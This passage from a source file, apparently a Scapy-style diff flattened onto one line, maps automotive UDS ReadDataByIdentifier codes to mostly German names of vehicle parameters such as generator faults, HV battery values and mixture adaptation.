Betriebszeit" -UDS_RDBI.dataIdentifiers[0x4115] = "Bremskreis Unterdruckpumpe Anzahl Aktivierung" # or Isolation measurement with closed contactors and positive rail -UDS_RDBI.dataIdentifiers[0x4116] = "Isolation measurement with closed contactors and negative rail" -UDS_RDBI.dataIdentifiers[0x4117] = "Isolation measurement combined with open contactors " -UDS_RDBI.dataIdentifiers[0x4118] = "Isolation test fully performed" -UDS_RDBI.dataIdentifiers[0x4149] = "HV Isolation" -UDS_RDBI.dataIdentifiers[0x41ee] = "DisCharge Power Available Long Term" -UDS_RDBI.dataIdentifiers[0x41ef] = "Charge Power Available Long Term" -UDS_RDBI.dataIdentifiers[0x4200] = "Kuehlerjalousie LIN Sollwert" -UDS_RDBI.dataIdentifiers[0x4201] = "Kuehlerjalousie LIN Referenzfahrt" -UDS_RDBI.dataIdentifiers[0x4202] = "Kuehlerjalousie LIN Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x4203] = "Kuehlmittel Drehschieberventil LIN Sollwert" -UDS_RDBI.dataIdentifiers[0x4204] = "Kuehlmittel Drehschieberventil LIN Referenzfahrt" -UDS_RDBI.dataIdentifiers[0x4205] = "Kuehlmittel Drehschieberventil LIN Referenzfahrt Fehler" -UDS_RDBI.dataIdentifiers[0x4206] = "Kuehlmittel Drehschieberventil LIN Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x4207] = "Kuehlmittel Drehschieberventil BMS LIN Sollwert" -UDS_RDBI.dataIdentifiers[0x4208] = "Kuehlmittel Drehschieberventil BMS LIN Referenzfahrt" -UDS_RDBI.dataIdentifiers[0x4209] = "Kuehlmittel Drehschieberventil BMS LIN Referenzfahrt Fehler" -UDS_RDBI.dataIdentifiers[0x420a] = "Kuehlmittel Drehschieberventil BMS LIN Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x4210] = "Kuehlermaskenjalousie LIN Sollwert" -UDS_RDBI.dataIdentifiers[0x4211] = "Kuehlermaskenjalousie LIN Referenzfahrt" -UDS_RDBI.dataIdentifiers[0x4212] = "Kuehlermaskenjalousie LIN Fehlerstatus" -UDS_RDBI.dataIdentifiers[0x4213] = "Kuehlmittelpumpe Getriebeoel Sollwert Read Kuehlmittelpumpe Getriebeoel Sollwert" -UDS_RDBI.dataIdentifiers[0x4214] = "Kuehlmittelpumpe Plugin Hybrid Sollwert" -UDS_RDBI.dataIdentifiers[0x4215] = "Kuehlaggregat Expansionsventil Sollwert" -UDS_RDBI.dataIdentifiers[0x4216] = "Kuehlmittelpumpe NT2 15W BMS Sollwert" -UDS_RDBI.dataIdentifiers[0x4217] = "PTC Zuheizer Plugin Hybrid Sollwert" -UDS_RDBI.dataIdentifiers[0x4800] = "Exhaust flap control state EGFC State" # or Exhaust gas flap State -UDS_RDBI.dataIdentifiers[0x4f01] = "RDiag oVCI Firewall Black List" -UDS_RDBI.dataIdentifiers[0x4f02] = "RDiag oVCI Configuration" -UDS_RDBI.dataIdentifiers[0x4f03] = "RDiag oVCI Default CommParam" -UDS_RDBI.dataIdentifiers[0x4f04] = "RDiag oVCI ECU List" -UDS_RDBI.dataIdentifiers[0x4f05] = "RDiag oVCI Firewall White List" -UDS_RDBI.dataIdentifiers[0x4f06] = "RDiag RDA Configuration" -UDS_RDBI.dataIdentifiers[0x4f07] = "RDiag RDA Trigger Configuration LogicalBlock 2" -UDS_RDBI.dataIdentifiers[0x4f08] = "RDiag RDA Trigger Configuration LogicalBlock 3" -UDS_RDBI.dataIdentifiers[0x4f09] = "RDiag RDA Trigger Configuration LogicalBlock 4" -UDS_RDBI.dataIdentifiers[0x4f0a] = "RDiag RDA Trigger Configuration LogicalBlock 5" -UDS_RDBI.dataIdentifiers[0x4f0b] = "RDiag RDA Trigger Configuration LogicalBlock 6" -UDS_RDBI.dataIdentifiers[0x4f0c] = "RDiag RDA Trigger Configuration LogicalBlock 7" -UDS_RDBI.dataIdentifiers[0x4f0d] = "RDiag RDA Trigger Configuration LogicalBlock 8" -UDS_RDBI.dataIdentifiers[0x4f0e] = "RDiag RDA Trigger Configuration LogicalBlock 9" -UDS_RDBI.dataIdentifiers[0x4f0f] = "RDiag RDA Trigger Configuration LogicalBlock 10" -UDS_RDBI.dataIdentifiers[0x4f10] = "RDiag RDA Trigger Configuration LogicalBlock 11" -UDS_RDBI.dataIdentifiers[0x5000] = "Generatorkennung" # or Motordrehzahl Read Response Parameters Motordrehzahl -UDS_RDBI.dataIdentifiers[0x5001] = "Eingestellter Erregerstrom" -UDS_RDBI.dataIdentifiers[0x5002] = "Auslastungsgrad" # or Motordrehzahl gefiltert -UDS_RDBI.dataIdentifiers[0x5003] = "Generator Funktionsfehler Detail Vorgemerkt" -UDS_RDBI.dataIdentifiers[0x5004] = "Messwert berechnetes Generatormoment Generator" -UDS_RDBI.dataIdentifiers[0x5005] = "Berechneter Generatorstrom" -UDS_RDBI.dataIdentifiers[0x5006] = "Generatorfehler Kommunikationsfehler" -UDS_RDBI.dataIdentifiers[0x5007] = "Generatorfehler elektrisch" -UDS_RDBI.dataIdentifiers[0x5008] = "Generatorfehler mechanisch" -UDS_RDBI.dataIdentifiers[0x5009] = "Generatorfehler Timeout" -UDS_RDBI.dataIdentifiers[0x5010] = "Klemme 15 CAN" # or Klemme 15 CAN Read Klemme 15 CAN, Aussenlufttemperatur ROH -UDS_RDBI.dataIdentifiers[0x5011] = "Generator Funktionsfehler Vorgemerkt Max Dauer" -UDS_RDBI.dataIdentifiers[0x5012] = "Schubbetrieb" -UDS_RDBI.dataIdentifiers[0x5013] = "Stoppmode" -UDS_RDBI.dataIdentifiers[0x5014] = "Gasbetrieb" -UDS_RDBI.dataIdentifiers[0x5015] = "Generator Kommunikationsfehler Vorgemerkt Max Dauer" -UDS_RDBI.dataIdentifiers[0x5016] = "Volumenstrom Vorgabe CAN" # or Generator Kommunikationsfehler Detail Vorgemerkt -UDS_RDBI.dataIdentifiers[0x5017] = "Generator Kommunikationsfehler Vorgemerkt" -UDS_RDBI.dataIdentifiers[0x5018] = "Generatorfehler Hochtemperatur von aktivem Generator" -UDS_RDBI.dataIdentifiers[0x501a] = "Generatorvorgaben Information" -UDS_RDBI.dataIdentifiers[0x501b] = "Generatorvorgaben Information" -UDS_RDBI.dataIdentifiers[0x501c] = "Generatorfehler Umgebungsdaten Information" -UDS_RDBI.dataIdentifiers[0x501d] = "Generatorfehler Umgebungsdaten Information" -UDS_RDBI.dataIdentifiers[0x5020] = "Fahrstufe" # or aktuelle(r) Gang / Fahrstufe, Zuendung Klemme15 CAN -UDS_RDBI.dataIdentifiers[0x5021] = "Getriebe Oeltemperatur" # or Geschwindigkeit der Hinterachse -UDS_RDBI.dataIdentifiers[0x5022] = "DCDC Kuelmitteltemperatur" # or Geschwindigkeit Vorderachse, Geschwindigkeit der Vorderachse -UDS_RDBI.dataIdentifiers[0x5023] = "Elektromaschine Inverter K hlwassertemperatur" -UDS_RDBI.dataIdentifiers[0x5024] = "Hochvolt Batterie Temperatur" -UDS_RDBI.dataIdentifiers[0x5025] = "Allrad Low Range aus AGK" # or OnBoard Lader Temperatur -UDS_RDBI.dataIdentifiers[0x5027] = "Klimaanforderung Vorne" -UDS_RDBI.dataIdentifiers[0x5028] = "Luefter Klimaanforderung" -UDS_RDBI.dataIdentifiers[0x5029] = "Luefter Kuehlanforderung" -UDS_RDBI.dataIdentifiers[0x5030] = "Aussenlufttemperatur tumg" -UDS_RDBI.dataIdentifiers[0x5031] = "Aussenlufttemperatur CAN (Kombi)" -UDS_RDBI.dataIdentifiers[0x5032] = "Extern modelierte Aussenlufttemperatur von CAN Kombi" -UDS_RDBI.dataIdentifiers[0x5033] = "Getriebefreigabe Automatgetriebe" -UDS_RDBI.dataIdentifiers[0x5034] = "Klemme 50 Startanforderung EZS" # or Klemme50 Startanforderung EZS -UDS_RDBI.dataIdentifiers[0x5035] = "PremAir Nachricht erkannt" -UDS_RDBI.dataIdentifiers[0x5040] = "Bremskreis Unterdruck" -UDS_RDBI.dataIdentifiers[0x5041] = "Bremskreis Unterdruckwert gueltig" -UDS_RDBI.dataIdentifiers[0x5042] = "Kickdownschalter" -UDS_RDBI.dataIdentifiers[0x504a] = "Clutch 1 Pressure learned characteristics" -UDS_RDBI.dataIdentifiers[0x504b] = "Clutch 2 Pressure learned characteristics" -UDS_RDBI.dataIdentifiers[0x504c] = "Clutch 3 Pressure learned characteristics" -UDS_RDBI.dataIdentifiers[0x504d] = "Clutch 4 Pressure learned characteristics" -UDS_RDBI.dataIdentifiers[0x505f] = "Transmission Oil Remaining Life" -UDS_RDBI.dataIdentifiers[0x5075] = "First Time Power Up Value" -UDS_RDBI.dataIdentifiers[0x50a0] = "MEC Manufacturers Enable" -UDS_RDBI.dataIdentifiers[0x50b2] = "HCP Status Register" # or TCM Status Registe" -UDS_RDBI.dataIdentifiers[0x50b4] = "Manufacturing Traceability Character" -UDS_RDBI.dataIdentifiers[0x50dd] = "Transmission Adaptives" -UDS_RDBI.dataIdentifiers[0x50de] = "Rate Based Monitoring" -UDS_RDBI.dataIdentifiers[0x5102] = "Kraftstoffmenge" -UDS_RDBI.dataIdentifiers[0x5103] = "Kraftstofffuellstand" -UDS_RDBI.dataIdentifiers[0x5105] = "Wert der aktuellen Hochspannung" -UDS_RDBI.dataIdentifiers[0x5116] = "Kilometerstand von CAN-Bus" -UDS_RDBI.dataIdentifiers[0x5200] = "AGR Niederdruck NT2 BMS Temperatur" -UDS_RDBI.dataIdentifiers[0x6000] = "Motordrehmoment" -UDS_RDBI.dataIdentifiers[0x6001] = "Adaption Kraftstoffdrucksensor" -UDS_RDBI.dataIdentifiers[0x6002] = "Motorzustand Schubabschaltung" -UDS_RDBI.dataIdentifiers[0x6003] = "Sychronisierungsverlust" # or SynchronizationLost, Leerlauferkennung, Systemlaufzeit, Motorzustand Leerlauferkennung -UDS_RDBI.dataIdentifiers[0x6004] = "Motorzustand Leerlaufregelung Aktiv" -UDS_RDBI.dataIdentifiers[0x6005] = "Motorzustand Vollasterkennung" -UDS_RDBI.dataIdentifiers[0x6006] = "Getriebeschutz" -UDS_RDBI.dataIdentifiers[0x6008] = "Nachstart aktiv" # or Motorzustand Nachstartanreicherung Abgeschaltet -UDS_RDBI.dataIdentifiers[0x600a] = "Motorzustand Start Aktiv" # or Start ist aktiv -UDS_RDBI.dataIdentifiers[0x6010] = "Energmanag HVBatterie Ladezustand" # or Gangsensor SG Adaption -UDS_RDBI.dataIdentifiers[0x6011] = "Energmanag HVBatterie Kapazitaet Stromintegral" # or Aussetzerzaehler HWZyl1, Gangsensor SG Adaption Fehler -UDS_RDBI.dataIdentifiers[0x6012] = "Kupplungspedalsensor Adaption" # or Energmanag HVBatterie Kapazitaet aktuell, Aussetzerzaehler HWZyl2 -UDS_RDBI.dataIdentifiers[0x6013] = "Aussetzerzaehler HWZyl3" # or Energmanag HVBatterie Strom, Kupplungspedalsensor Adaptionswert Pedal losgelassen -UDS_RDBI.dataIdentifiers[0x6014] = "HVBatterie Ladezustand nach Spg Tabelle" # or Energmanag HVBatterie Ladezustand nach Spg Tabelle, Kupplungspedalsensor Adaptionswert Pedal gedrueckt -UDS_RDBI.dataIdentifiers[0x6015] = "Kupplungspedalsensor Adaption Fehler" # or ESOC OCV Arr21 10mV 0 -UDS_RDBI.dataIdentifiers[0x6016] = "Kupplungspedalsensor Adaptionswert Pedal losgelassen gueltig" -UDS_RDBI.dataIdentifiers[0x6017] = "Energmanag HVBatterie Innenwiderstand Korr Laden" # or Kupplungspedalsensor Adaptionswert Pedal gedrueckt gueltig -UDS_RDBI.dataIdentifiers[0x6018] = "Gangsensor SG Nulllagenadaptionswert gueltig" # or Energmanag HVBatterie Innenwiderstand Korr Entladen -UDS_RDBI.dataIdentifiers[0x6019] = "HVBatterie" # or EDIAG Batt Volt StepDelta 0, Gangsensor SG Rueckwaertsgang Adaptionswert gueltig -UDS_RDBI.dataIdentifiers[0x601a] = "Gangsensor SG Gang6Adaptionswert gueltig" -UDS_RDBI.dataIdentifiers[0x601e] = "Luftansaugung Klappe links Fehler Referenzfahrt" -UDS_RDBI.dataIdentifiers[0x601f] = "Luftansaugung Klappe rechts Fehler Referenzfahrt" -UDS_RDBI.dataIdentifiers[0x6020] = "Abgasklappe Adaption laeuft" # or Energmanag HVSchuetze Zuendungszaehler Fahrzeugwerk, Kompressionspruefungsstatus -UDS_RDBI.dataIdentifiers[0x6021] = "Abgasklappe Adaption fertig" # or Energmanag HVSystem spannungsfrei -UDS_RDBI.dataIdentifiers[0x6022] = "Abgasklappe Adaption erfolgreich" -UDS_RDBI.dataIdentifiers[0x6023] = "Abgasklappe Adaption Abbruch" -UDS_RDBI.dataIdentifiers[0x6024] = "Abgasklappe Adaption Fehler" # or Kompressionszeit Zylinder 4 -UDS_RDBI.dataIdentifiers[0x6025] = "Kompressionszeit Zylinder 5" # or Abgasklappe Diagnosemodus -UDS_RDBI.dataIdentifiers[0x6026] = "Kompressionszeit Zylinder 6" # or Abgasklappe Hardware -UDS_RDBI.dataIdentifiers[0x6027] = "Abgasklappe Endstufenspannung" -UDS_RDBI.dataIdentifiers[0x6029] = "Abgasklappe Positionssensor Fehler" -UDS_RDBI.dataIdentifiers[0x6030] = "Laufruhe HWZyl1" # or Abgasklappe Regelfehler -UDS_RDBI.dataIdentifiers[0x6031] = "Laufruhe HWZyl2" -UDS_RDBI.dataIdentifiers[0x6032] = "Laufruhe HWZyl3" -UDS_RDBI.dataIdentifiers[0x6033] = "Abgasklappe Regelung" # or Laufruhe Zylinder 4 -UDS_RDBI.dataIdentifiers[0x6034] = "Abgasklappe Zaehler Freibrechereignisse" # or Laufruhe Zylinder 5 -UDS_RDBI.dataIdentifiers[0x6035] = "Abgasklappe Zustand Aktiv" # or Laufruhe Zylinder 6 -UDS_RDBI.dataIdentifiers[0x6036] = "Abgasklappe Zustand Fehler" -UDS_RDBI.dataIdentifiers[0x6037] = "Abgasklappe Zustand Standby" -UDS_RDBI.dataIdentifiers[0x6038] = "Abgasklappe Zustand Wartung" -UDS_RDBI.dataIdentifiers[0x603b] = "Abgasklappe Federrueckstellzeit" -UDS_RDBI.dataIdentifiers[0x6040] = "Produktionsmodus Fahrzyklen" # or Zuendwinkelspaetverstellung Mittelwert -UDS_RDBI.dataIdentifiers[0x6041] = "Zuendwinkelspaetverstellung HWZyl1" # or TD Counter -UDS_RDBI.dataIdentifiers[0x6042] = "Zuendwinkelspaetverstellung HWZyl2" # or TD km Stand erstes -UDS_RDBI.dataIdentifiers[0x6043] = "TD km Stand letztes" # or Zuendwinkelspaetverstellung HWZyl3 -UDS_RDBI.dataIdentifiers[0x6044] = "TD km Stand Reset" -UDS_RDBI.dataIdentifiers[0x6045] = "HVBatterie Energieinhalt Korrekturfaktor" -UDS_RDBI.dataIdentifiers[0x6049] = "HVBatterie Ladezustand berechnet" -UDS_RDBI.dataIdentifiers[0x6050] = "HVBatterie Ladezustand" -UDS_RDBI.dataIdentifiers[0x6051] = "HVBatterie Kapazitaet Stromintegral" -UDS_RDBI.dataIdentifiers[0x6052] = "HVBatterie Kapazitaet aktuell" -UDS_RDBI.dataIdentifiers[0x6053] = "HVBatterie Strom" -UDS_RDBI.dataIdentifiers[0x6055] = "HVBatterie OCV Kennlinie" -UDS_RDBI.dataIdentifiers[0x6056] = "HVBatterie Innenwiderstand Korr Laden" -UDS_RDBI.dataIdentifiers[0x6057] = "HVBatterie Innenwiderstand Korr Entladen" -UDS_RDBI.dataIdentifiers[0x6058] = "HVBatterie Test" -UDS_RDBI.dataIdentifiers[0x6059] = "HVBatterie Testerg Kapazitaet" -UDS_RDBI.dataIdentifiers[0x6060] = "HVBatterie Testerg Startspannung" # or BedingungFuelOnAdaptionGestoppt -UDS_RDBI.dataIdentifiers[0x6061] = "On Adaption Reset Durchfuehren" # or HVBatterie Testerg Spannungs Schrittweite, AnforderungFuelOnAdaptionResetDurchfuehren -UDS_RDBI.dataIdentifiers[0x6062] = "On Adaption Reset Durchgefuehrt" # or HVBatterie Testerg Kapazitaets Schrittweite -UDS_RDBI.dataIdentifiers[0x6063] = "FuelOnAdaptionFertigDominanterBereich" # or HVBatterie Testerg Widerstandsabgleich bei Ladung -UDS_RDBI.dataIdentifiers[0x6064] = "FuelOnAdaptionAngehalten" # or HVBatterie Testerg Widerstandsabgleich bei Entladung -UDS_RDBI.dataIdentifiers[0x6065] = "FuelOnAdaptionGestoppt" # or On Adaption Gestoppt, HVBatterie Testerg max Zellenspg bei R Messung -UDS_RDBI.dataIdentifiers[0x6066] = "FuelOnAdaptionReset" # or On Adaption Reset, HVBatterie Testerg max Zellenspg bei Kap Messung -UDS_RDBI.dataIdentifiers[0x6067] = "On Adaption Bedingung Gestoppt" # or HVBatterie Testerg Umgebungsinfo Widerstandsmessung, FuelOnAdaption -UDS_RDBI.dataIdentifiers[0x6068] = "FuelOnAdaptionAktuellerBereich" -UDS_RDBI.dataIdentifiers[0x6069] = "FuelOnAdaptionStatus" -UDS_RDBI.dataIdentifiers[0x606a] = "HVBatterie Energieinhalt Widerstandskorrekturfaktor" -UDS_RDBI.dataIdentifiers[0x606b] = "Geberradadaption angehalten wg. Aussetzer" # or Off On Adaption Angehalten Aussetzer, HVBatterie Energiezustand -UDS_RDBI.dataIdentifiers[0x606c] = "Energieverbrauch Lebenszeit" # or Off On Adaption Laufunruhe zu gross -UDS_RDBI.dataIdentifiers[0x606d] = "Energieverbrauch Kwh Stunde" -UDS_RDBI.dataIdentifiers[0x606e] = "klassifizierung Fehlerstromsumme" -UDS_RDBI.dataIdentifiers[0x606f] = "Off Adaption Freigabe DMDFOF3" # or HV Schuetze geschlossen -UDS_RDBI.dataIdentifiers[0x6070] = "On Adaption Fertig" # or FuelOnBedingungAdaptionAktuell ReadyFertig, DCDC Vorgabe Niederspannung -UDS_RDBI.dataIdentifiers[0x6071] = "Fuel-Off Adaption Fertig Bereich1" # or DCDC Vorgabe Hochspannung, Off Adaption Fertig Bereich1 -UDS_RDBI.dataIdentifiers[0x6072] = "Fuel-Off Adaption Freigabe" # or DCDC Vorgabe Strom auf Niederspannungsseite, Off Adaption Freigabe -UDS_RDBI.dataIdentifiers[0x6073] = "Off Adaption Laeuft" # or FuelOffAdaptionLaeuft, DCDC Vorgabe Strom auf Hochspannungsseite -UDS_RDBI.dataIdentifiers[0x6074] = "DCDC Vorgabestatus" -UDS_RDBI.dataIdentifiers[0x6075] = "DCDC Hochspannung" -UDS_RDBI.dataIdentifiers[0x6076] = "Ergebnis der Geberradadaption Segment" -UDS_RDBI.dataIdentifiers[0x6077] = "Ergebnis der Geberradadaption Segment" -UDS_RDBI.dataIdentifiers[0x6078] = "Reset Fuel On Adaption Durchgefuehrt Hybrid" -UDS_RDBI.dataIdentifiers[0x6079] = "On Adaption Status HYBRID" -UDS_RDBI.dataIdentifiers[0x607a] = "Fuel-Off Adaption Fertig Bereich1 Hybrid" -UDS_RDBI.dataIdentifiers[0x607b] = "FuelOffAdaptionLaeuft Hybrid" -UDS_RDBI.dataIdentifiers[0x607c] = "Filterwert Fuel Off Geberradadaption" -UDS_RDBI.dataIdentifiers[0x607d] = "Off Adaption Ergebniswert DMDFOF3" -UDS_RDBI.dataIdentifiers[0x607e] = "Off Adaption KatheizSegment aktiv" -UDS_RDBI.dataIdentifiers[0x607f] = "Off Adaption Fertig KatheizSegment" -UDS_RDBI.dataIdentifiers[0x6080] = "Gemischadaption Multiplikativ" # or Multiplikative Gemischadaption aktiv, Reiserechner Kraftstoffmenge erfolgreich geschrieben -UDS_RDBI.dataIdentifiers[0x6081] = "Gemischadaption Additiv" # or Additive Gemischadaption aktiv -UDS_RDBI.dataIdentifiers[0x6082] = "Gemischadaption" # or Kraftstoffverbrauch Lebenszeit, Gemischadaptionsphase aktiv -UDS_RDBI.dataIdentifiers[0x6083] = "Kraftstoffverbrauch Gesamtstrecke Lebenszeit" # or Gemischadaption Additiver Bereich -UDS_RDBI.dataIdentifiers[0x6084] = "Kraftstoffvolumen Lebenszeit Anzeige" -UDS_RDBI.dataIdentifiers[0x6085] = "Gemischadaption Additiv Integrator Stabil" -UDS_RDBI.dataIdentifiers[0x6086] = "Gemischadaption Additiv Integrator Stabil" -UDS_RDBI.dataIdentifiers[0x6087] = "Gemischadaption Additiv Lernwert" # or Additive Gemischkorrektur Bank 1 (Leerlauf) -UDS_RDBI.dataIdentifiers[0x6088] = "Additive Gemischkorrektur" -UDS_RDBI.dataIdentifiers[0x6089] = "Gemischadaption Additiv HFM" # or Additive Gemischkorrektur Bank 1 HFM -UDS_RDBI.dataIdentifiers[0x6090] = "Additive Gemischkorrektur Bank 2 HFM" -UDS_RDBI.dataIdentifiers[0x6091] = "Gemischadaption Additiv Drucksensor" # or Additive Gemischkorrektur Bank 1 (P-System) -UDS_RDBI.dataIdentifiers[0x6092] = "Additive Gemischkorrektur Bank 2 (P-System)" -UDS_RDBI.dataIdentifiers[0x6093] = "Grundadaption Bank 1 tra-Integrator" -UDS_RDBI.dataIdentifiers[0x6094] = "Grundadaption Bank 2 tra-Integrator" -UDS_RDBI.dataIdentifiers[0x6095] = "Integrator fra Bank 1 unten" # or Gemischadaption Integrator unten Lernwert -UDS_RDBI.dataIdentifiers[0x6096] = "Integrator fra Bank 2 unten" -UDS_RDBI.dataIdentifiers[0x6097] = "Integrator tra" -UDS_RDBI.dataIdentifiers[0x6098] = "Integrator tra" -UDS_RDBI.dataIdentifiers[0x6099] = "Grundadaption Bank 1 fra-Integrator" # or Gemischadaption Grundadaption Integrator -UDS_RDBI.dataIdentifiers[0x6100] = "Grundadaption Bank 2 fra-Integrator" -UDS_RDBI.dataIdentifiers[0x6101] = "Gemischadaption Multiplikativer Bereich" # or Berechneter Kraftstoffdruck -UDS_RDBI.dataIdentifiers[0x6102] = "Hebelgeber rechts Widerstand" -UDS_RDBI.dataIdentifiers[0x6103] = "Gemischadaptionswert Multiplikativ Rechts Unten" # or Multiplikative Gemischkorrektur Bank 1 unten (Teillast), Hebelgeber links Widerstand -UDS_RDBI.dataIdentifiers[0x6104] = "Multiplikative Gemischkorrektur Bank 2 unten" -UDS_RDBI.dataIdentifiers[0x6105] = "Gemischadaptionswert Multiplikativ" # or Multiplikativer Gemischadaptionsfaktor Bank 1 (Teillast) -UDS_RDBI.dataIdentifiers[0x6106] = "Volumenstrom berechnet" # or Multiplikativer Gemischadaptionsfaktor -UDS_RDBI.dataIdentifiers[0x6107] = "Gemischadaption Multiplikativ Gemischkorrektur" -UDS_RDBI.dataIdentifiers[0x6108] = "Multiplikative Gemischkorrektur" -UDS_RDBI.dataIdentifiers[0x6109] = "Typ 6letztes" -UDS_RDBI.dataIdentifiers[0x610a] = "Typ 5letztes" -UDS_RDBI.dataIdentifiers[0x610b] = "Typ 4letztes" -UDS_RDBI.dataIdentifiers[0x610c] = "Typ 3letztes" -UDS_RDBI.dataIdentifiers[0x610d] = "Typ vorletztes" -UDS_RDBI.dataIdentifiers[0x610e] = "Typ letztmaliges" -UDS_RDBI.dataIdentifiers[0x6110] = "erstmaliges" -UDS_RDBI.dataIdentifiers[0x6111] = "9letztes" # or Gemischadaption Kurztest Ergebnis -UDS_RDBI.dataIdentifiers[0x6112] = "8letztes" # or Gemischadaption Kurztest Ergebnis -UDS_RDBI.dataIdentifiers[0x6113] = "Gemischadaption Kurztest Errorflag" # or 7letztes -UDS_RDBI.dataIdentifiers[0x6114] = "Gemischadaption Kurztest Errorflag" # or 6letztes -UDS_RDBI.dataIdentifiers[0x6115] = "Gemischadaption Kurztest Zyklusflag" # or 5letztes -UDS_RDBI.dataIdentifiers[0x6116] = "4letztes" # or Gemischadaption Kurztest Zyklusflag -UDS_RDBI.dataIdentifiers[0x6117] = "Gemischadaption Kurztest Lambdareglerabweichung" -UDS_RDBI.dataIdentifiers[0x6118] = "Kurztest Signalfehler" -UDS_RDBI.dataIdentifiers[0x6119] = "letztes" # or Gemischadaption Kurztest Ergebnis Unplausibel -UDS_RDBI.dataIdentifiers[0x6120] = "Gemischadaption Kurztest Ergebnis Unplausibel" -UDS_RDBI.dataIdentifiers[0x6121] = "Gemischadaption Additiv Fertig" -UDS_RDBI.dataIdentifiers[0x6122] = "Gemischadaption Multiplikativ Unten Fertig" -UDS_RDBI.dataIdentifiers[0x6124] = "Geschwindigkeit erstmaliges" -UDS_RDBI.dataIdentifiers[0x6125] = "Geschwindigkeit 9letztes" -UDS_RDBI.dataIdentifiers[0x6126] = "Geschwindigkeit 8letztes" -UDS_RDBI.dataIdentifiers[0x6127] = "Gemischadaption Nach Reset Fertig" -UDS_RDBI.dataIdentifiers[0x6128] = "Geschwindigkeit 6letztes" -UDS_RDBI.dataIdentifiers[0x6129] = "Geschwindigkeit 5letztes" -UDS_RDBI.dataIdentifiers[0x612a] = "Geschwindigkeit 4letztes" -UDS_RDBI.dataIdentifiers[0x612b] = "Geschwindigkeit 3letztes" -UDS_RDBI.dataIdentifiers[0x612c] = "Geschwindigkeit vorletztes" -UDS_RDBI.dataIdentifiers[0x612d] = "Geschwindigkeit letztes" -UDS_RDBI.dataIdentifiers[0x6130] = "Drehzahl erstmaliges" # or Lambdaregelwert -UDS_RDBI.dataIdentifiers[0x6131] = "Lambdaregelwert" # or Drehzahl 9letztes -UDS_RDBI.dataIdentifiers[0x6132] = "Lambdaregelfaktor Mittelwert" -UDS_RDBI.dataIdentifiers[0x6133] = "Schneller Mittelwert Lambdaregelfaktors" -UDS_RDBI.dataIdentifiers[0x6134] = "Mittelwert vom Produkt Abweichung Lambdaregler-Lambda" # or Lambdaregler Abweichung Mittelwert -UDS_RDBI.dataIdentifiers[0x6135] = "Sondenbereitschaft Rechts Vor KAT" # or O2Regelsonde Bank 1 bereit -UDS_RDBI.dataIdentifiers[0x6136] = "O2Regelsonde Bank 2 bereit" -UDS_RDBI.dataIdentifiers[0x6137] = "O2Diagnosesonde Bank 1 bereit" # or Sondenbereitschaft Rechts Nach KAT -UDS_RDBI.dataIdentifiers[0x6138] = "O2Diagnosesonde Bank 2 bereit" -UDS_RDBI.dataIdentifiers[0x6139] = "Drehzahl letztes" -UDS_RDBI.dataIdentifiers[0x613a] = "Oeltemperatur erstmaliges" -UDS_RDBI.dataIdentifiers[0x613b] = "Oeltemperatur 9letztes" -UDS_RDBI.dataIdentifiers[0x613c] = "Oeltemperatur 8letztes" -UDS_RDBI.dataIdentifiers[0x613d] = "Oeltemperatur 7letztes" -UDS_RDBI.dataIdentifiers[0x613e] = "Oeltemperatur 6letztes" -UDS_RDBI.dataIdentifiers[0x613f] = "Oeltemperatur 5letztes" -UDS_RDBI.dataIdentifiers[0x6140] = "Oeltemperatur 4letztes" -UDS_RDBI.dataIdentifiers[0x6141] = "Oeltemperatur 3letztes" -UDS_RDBI.dataIdentifiers[0x6142] = "Oeltemperatur vorletztes" -UDS_RDBI.dataIdentifiers[0x6143] = "Lambda Sollwert" # or Oeltemperatur letztes -UDS_RDBI.dataIdentifiers[0x6144] = "Lambda Sollwert" # or rel Motorlast erstmaliges -UDS_RDBI.dataIdentifiers[0x6145] = "Sonde Anzahl Dynamikmessungen LSU" # or Anzahl der Dynamikmessungen LSU rechte -UDS_RDBI.dataIdentifiers[0x6146] = "Anzahl der Dynamikmessungen LSU linke" -UDS_RDBI.dataIdentifiers[0x6147] = "Lambdaregelung I Anteil hinter Kat rechte Bank (DE" -UDS_RDBI.dataIdentifiers[0x6148] = "Lambdaregelung I Anteil hinter Kat linke Bank (DE" -UDS_RDBI.dataIdentifiers[0x6149] = "Sonde Dynamikwert Der LSU" # or Dynamikwert der LSU rechte -UDS_RDBI.dataIdentifiers[0x614a] = "rel Motorlast 4letztes" -UDS_RDBI.dataIdentifiers[0x614b] = "rel Motorlast 3letztes" -UDS_RDBI.dataIdentifiers[0x614c] = "rel Motorlast vorletztes" -UDS_RDBI.dataIdentifiers[0x614d] = "rel Motorlast letztes" -UDS_RDBI.dataIdentifiers[0x614e] = "Zaehler Sensorfehler" -UDS_RDBI.dataIdentifiers[0x614f] = "Servicestatus aktuell" -UDS_RDBI.dataIdentifiers[0x6150] = "Dynamikwert der LSU linke" -UDS_RDBI.dataIdentifiers[0x6151] = "Kat Diagnose Sauerstoffspeichervermoegen gefiltert" -UDS_RDBI.dataIdentifiers[0x6152] = "Restlaufstrecke Anzeige" -UDS_RDBI.dataIdentifiers[0x6153] = "Startlaufstrecke" -UDS_RDBI.dataIdentifiers[0x6154] = "Restlaufstrecke Intern" -UDS_RDBI.dataIdentifiers[0x6155] = "Restlaufstrecke AdBlue" -UDS_RDBI.dataIdentifiers[0x6156] = "Restlaufstrecke Extern" -UDS_RDBI.dataIdentifiers[0x6157] = "Restlaufstrecke Kraftstoff" -UDS_RDBI.dataIdentifiers[0x6158] = "Restlaufstrecke Russ" -UDS_RDBI.dataIdentifiers[0x6159] = "Restlaufstrecke Viskositaet" -UDS_RDBI.dataIdentifiers[0x6160] = "Motorzustand Verbrennungsmotor laeuft" -UDS_RDBI.dataIdentifiers[0x6161] = "Leerlaufdrehzahlanhebung Abbruchgrund" # or Bitleiste zur Anzeige von Abbruchgruenden bei der Erhoehung der Leerlaufdrehzahl als Steller -UDS_RDBI.dataIdentifiers[0x6162] = "Gefahrene km Verbrennungsmotor" -UDS_RDBI.dataIdentifiers[0x6163] = "Gefahrene km E-Motor" -UDS_RDBI.dataIdentifiers[0x6164] = "Katalysatordiagnose freigegeben" -UDS_RDBI.dataIdentifiers[0x6165] = "Normiertes Sauerstoffspeichervermoegen des Katalysators, rechte" # or Kat Diagnose Sauerstoffspeichervermoegen normiert -UDS_RDBI.dataIdentifiers[0x6166] = "Normiertes Sauerstoffspeichervermoegen des Katalysators, linke" # or Oelstand -UDS_RDBI.dataIdentifiers[0x6167] = "Kat Diagnose 